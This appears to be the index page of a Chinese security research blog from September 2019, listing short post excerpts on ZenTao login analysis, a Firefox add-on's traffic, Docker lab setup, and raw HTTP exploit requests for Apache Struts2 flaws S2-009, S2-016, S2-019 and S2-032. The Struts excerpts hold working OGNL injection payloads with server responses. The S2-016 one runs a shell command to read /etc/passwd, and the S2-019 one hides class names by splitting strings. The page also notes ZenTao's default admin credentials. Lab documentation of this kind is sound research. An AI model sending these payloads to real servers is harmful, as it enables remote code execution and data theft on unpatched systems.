Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

Fofa 高级搜索语法、SDK/API使用 与 PoC 编写教程

September 16, 2019

Fofa 高级搜索语法、SDK/API使用 与 PoC 编写教程

Fofa 高级搜索语法、SDK/API使用 与 PoC 编写教程 <!–more–> 正文 录播视频已上传至百度网盘 链接:https://pan.baidu.com/s/1MquLQh5Ge_MjDQo9cRHrbA 提取码:rna4

September 16, 2019

禅道 登陆过程黑盒逆向分析

Contents1 禅道 弱口令分析1.1 正文1.1.1 默认配置1.1.2 密码密文的计算方式1.1.3 登陆成功1.1.4 登陆失败1.2 逆向登陆流程1.2.1 观察登陆过程 禅道 弱口令分析 <!–more–> 正文 默认配置 http://192.168.198.133/zentao/admin-safe.html 默认配置的禅道会要求管理员登陆后修改弱口令。 密码密文的计算方式 hashTable.md5(hashTable.md5(this.plaintext)+this.salt) $(‘#loginPanel #submit’).click(function() { var password = $(‘input:password’).val().trim(); var passwordStrength = computePasswordStrength(password); $(‘#submit’).after("<input type=’hidden’ name=’passwordStrength’ value=’" + passwordStrength + "’>"); var rand = $(‘input#verifyRand’).val(); if(password.length != 32 && typeof(md5) == ‘function’) $(‘input:password’).val(md5(md5(password) + rand)); }); 登陆成功 请求 […]

September 16, 2019

Firefox 插件 Flash Video Downloader 部分 HTTP 通讯流量情况

Firefox 插件 部分 HTTP 通讯流量情况 <!–more–> 正文 https://addons.mozilla.org/zh-CN/firefox/addon/flash-videodownloader/?src=search 请求 GET /api/config/?id=ductloanphuok%40gmail.com&amp;version=6.3.14&amp;lt=31004081&amp;uid=95345bc6-b220-efd2-c070-2c8a1701c10d&amp;r=1568608207951 HTTP/1.1 Host: flashvd.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: __cfduid=d217ed1370e498eae12b455cc40594adc1568255256 响应 HTTP/1.1 200 OK Date: Mon, 16 Sep 2019 04:30:04 GMT Content-Type: application/json Connection: close Alt-Svc: h2=&quot;:443&quot;; […]

September 16, 2019

使用 Docker 搭建禅道社区版

使用 Docker 搭建禅道社区版 <!–more–> 正文 https://hub.docker.com/r/idoop/zentao/tags sudo docker pull idoop/zentao:10.0 sudo mkdir -p /data/zbox && \ sudo docker run -d -p 80:80 -p 33306:3306 \ -e ADMINER_USER="root" -e ADMINER_PASSWD="password" \ -e BIND_ADDRESS="false" \ -v /data/zbox/:/opt/zbox/ \ –add-host smtp.exmail.qq.com:163.177.90.125 \ –name zentao-server \ idoop/zentao:10.0 禅道后台默认密码 admin/123456 。 参考资料 某道全版本rce漏洞分析 https://xz.aliyun.com/t/6239

September 12, 2019

Struts2 S2-019 HTTP raw text

Contents1 Struts2 S2-019 HTTP raw text1.0.1 检测请求1.0.2 利用请求1.1 截图 Struts2 S2-019 HTTP raw text <!–more–> 检测请求 POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN User-Agent: Auto Spider 1.0 Accept-Encoding: gzip, deflate Connection: close Content-Length: 492 Content-Type: application/x-www-form-urlencoded debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()HTTP/1.1 200 Set-Cookie: JSESSIONID=339037A73494B91A16B5EC3974F956EC; Path=/; HttpOnly Content-Type: text/plain;charset=ISO-8859-1 Transfer-Encoding: chunked Date: Thu, 12 Sep 2019 07:42:15 GMT Connection: close 16 […]

September 12, 2019

Struts2 S2-020 环境

Struts2 S2-020 环境 <!–more–> 正文 https://hub.docker.com/r/tutum/tomcat 已经设置好 host manager 的 tomcat 环境 tomcat

September 12, 2019

某道全版本rce漏洞分析

某道全版本rce漏洞分析 <!–more–> https://xz.aliyun.com/t/6239

September 12, 2019

Struts S2-032 HTTP raw text

Contents1 Struts S2-032 HTTP raw text1.1 正文1.2 分析1.2.1 探测请求1.2.1.1 OGNL1.2.2 利用请求1.2.2.1 OGNL Struts S2-032 HTTP raw text <!–more–> 正文 分析 [![s2-032](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032")](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032") 探测请求 POST / HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133:8888 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 209 method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%2888888888-1%29%2c%23kxlzx.close HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 9 […]

September 11, 2019

Struts S2-016 HTTP Raw TEXT

Contents1 Struts S2-016 HTTP Raw TEXT1.1 利用请求1.2 检测请求1.2.1 方式一1.2.2 方式二 Struts S2-016 HTTP Raw TEXT <!–more–> 利用请求 POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 651 redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{‘/bin/sh’,’-c’,’cat+/etc/passwd’})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D= HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 07:07:30 GMT Transfer-Encoding: chunked […]

September 11, 2019

Struts S2-009 HTTP Raw TEXT

Struts S2-009 HTTP Raw TEXT <!–more–> 正文 POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 444 class.classLoader.jarPath=%28%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23outstr%3d@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23outstr.print%28%22webpath%22%29%2c%23outstr.println%28%22888888%22%29%2c%23outstr.close%28%29%29%28meh%29&amp;z%5b%28class.classLoader.jarPath%29%28%27meh%27%29%5d= HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 04:00:24 GMT Content-Length: 15 Connection: keep-alive Set-Cookie: JSESSIONID=16985C7B820E22E13767E10B8AD57496-n1; Path=/ Content-Language: zh-CN webpath888888